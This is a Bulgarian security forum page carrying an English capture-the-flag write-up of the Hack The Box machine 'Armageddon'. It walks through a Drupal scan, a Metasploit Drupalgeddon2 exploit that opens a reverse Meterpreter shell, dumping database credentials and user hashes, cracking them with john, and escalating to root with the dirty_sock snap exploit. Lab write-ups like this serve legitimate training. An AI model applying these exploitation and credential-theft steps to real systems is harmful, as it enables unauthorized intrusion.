Преминете към съдържанието

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

Търсене в общността

Showing results for tags 'armageddon'.

  • Търти по таг

    Напиши таг и в края сложи запетая
  • Търси по автор

Тип на съдържание


Форум

  • ЗА ФОРУМА / ABOUT THE FORUM
    • Условия за ползване, препоръки и работа с форумите
  • ИНФОРМАЦИОННА СИГУРНОСТ / INFORMATION SECURITY
    • Пенетрейшън тестове
    • Тестове за социално инженерство
    • Експлойти
    • Инструменти
    • Вируси
    • Програмиране
    • Криптография
    • Сертифициране
    • След дъжд-качулка :)
    • Безжични мрежи, мобилни устройства и друг хардуер
    • Роботика и Дронове
    • Физическа сигурност
    • Поверителност | Privacy
  • Ресурси / Resources
    • Новини: По света и у нас
    • Уроци
    • Състезания за хакери
    • Книги, филми, списания
    • Интересни събития
  • ДРУГИ / OTHERS
    • Кариерно развитие
    • Продавалник (Купува/Продава, Търси/Предлага)
    • Съответствие, наредби и стандарти
    • Уеб дизайн
    • Оф-Топик
  • Булхак Академи на Кали Линукс
  • Bodyguard and Security Association на Общи условия

Блогове

  • Булхак Академи на Видеа - YouTube
  • Булхак Академи на HTB - WriteUps
  • Bodyguard and Security Association на Блог

Намери резултати в...

Намери резултати които съдържат...


дата на създаване

  • Start

    Край


Последно обновено

  • Start

    Край


Filter by number of...

Регистриран

  • Start

    Край


Група


За мен


Telegram


Уебсайт


Фейсбук


Интереси


Локация

  1. Enumeration Service Scan The service scan reveals two open ports. A web application is running and has interesting directories to check. Additionally, we see Drupal 7 running, which gives us somewhat of a direction. ` # nmap -sC -sV -p-65535 armageddon Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-08 04:58 EDT Nmap scan report for armageddon (10.10.10.233) Host is up (0.050s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.82 seconds Droopescan Thought to google dropal scanners and got a tool from github called droopescan. # ./droopescan scan drupal -u http://armageddon [+] Plugins found: profile http://armageddon/modules/profile/ php http://armageddon/modules/php/ image http://armageddon/modules/image/ [+] Themes found: seven http://armageddon/themes/seven/ garland http://armageddon/themes/garland/ [+] Possible version(s): 7.56 [+] Possible interesting urls found: Default changelog file - http://armageddon/CHANGELOG.txt [+] Scan finished (0:01:07.454052 elapsed) Searchsploit Further internet searches on the applicable exploits led me to Drupalgeddon and will try it out in the next stage. $ searchsploit drupal -------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------- --------------------------------- Drupal 4.0 - News Message HTML Injection | php/webapps/21863.txt Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt Drupal 5.21/6.16 - Denial of Service | php/dos/10826.sh Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections | php/webapps/32415.txt Drupal Module CAPTCHA - Security Bypass | php/webapps/35335.html Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross-Site Scripting | php/webapps/18389.txt Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | php/webapps/35072.txt Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb Drupal Module Sections - Cross-Site Scripting | php/webapps/10485.txt Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection | php/webapps/33410.txt -------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Exploit ## metasploit drupalgeddon2 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit [*] Started reverse TCP handler on 10.10.14.6:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. [*] Sending stage (39282 bytes) to 10.10.10.233 [*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.233:41324) at 2021-06-08 06:09:47 -0400 meterpreter > sysinfo Computer : armageddon.htb OS : Linux armageddon.htb 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 Meterpreter : php/linux We have a couple of directories in /var/www/html directory. After traversing the files, I have discovered a config file which contains a password and a username in settings.php within sites/default directory. I have also uploaded some privesc tools such as unix-privesc-check and linenum from meterpreter upload functionality. ls authorize.php cron.php INSTALL.mysql.txt INSTALL.sqlite.txt linenum.sh modules README.txt sites update.php web.config CHANGELOG.txt includes INSTALL.pgsql.txt INSTALL.txt MAINTAINERS.txt out.txt robots.txt themes UPGRADE.txt xmlrpc.php COPYRIGHT.txt index.php install.php LICENSE.txt misc profiles scripts unix-privesc-check cat usersdump.sql <deleted> $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupal', 'username' => 'drupaluser', 'password' => 'CQHEy@9M*m23gBVj', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), <deleted> Next, I'm using the credentials to login to drupal db and enumerate its tables. Following that, I'm dumping the users table from the database 'drupal'. Finally, I am analysing the dump file and discovered credentials for *brucetherealadmin*. mysql -u drupaluser -p -D drupal -e 'show tables;' <deleted> users <deleted> mysqldump -u drupaluser -p drupal users > usersdump.sql cat usersdump.sql <deleted> (1,'brucetherealadmin','$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt','[email protected]','','','filtered_html',1606998756,1607077194,1607076276,1,'Europe/London','',0,'[email protected]','a:1:{s:7:\"overlay\";i:1;}'), <deleted> Cracking the hash with john was easy and straightforward. john forjohn -w /usr/share/wordlists/rockyou.txt $ cat /home/kali/.john/john.pot $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo Login to the web application with credentials. Remembered there is an ssh service running so I tried logging into it. # ssh [email protected] The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established. ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts. [email protected]'s password: Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5 [brucetherealadmin@armageddon ~]$ I have discovered that the binary *snap* does not require password and is owned by root. brucetherealadmin@armageddon ~]$ sudo -l Matching Defaults entries for brucetherealadmin on armageddon: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User brucetherealadmin may run the following commands on armageddon: (root) NOPASSWD: /usr/bin/snap install * A little research on snap gives us GTFO-bins solutions to the problem. 1. Tried https://gtfobins.github.io/gtfobins/snap/ but did not work. 2. A bit additional research reveals https://github.com/initstring/dirty_sock I have followed the steps from '2' and it did not work. It seems the python version is incorrect. So I coppied the source code of the exploit and pasted it into a new file and ran it with the correct python version. Finally, I was able to root the box by installing the snap exploit, which created a user called dirty_sock:dirty_sock which provides us with root access. The box is quite interesting and it's nice to learn something new such as the snap vulnerability and ways to exploit. All in all, pretty fun box.

HACKING.BG Партньори

Asset3.png.df693f7661f6e8a7a3ec208659eda80b.pngtransparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy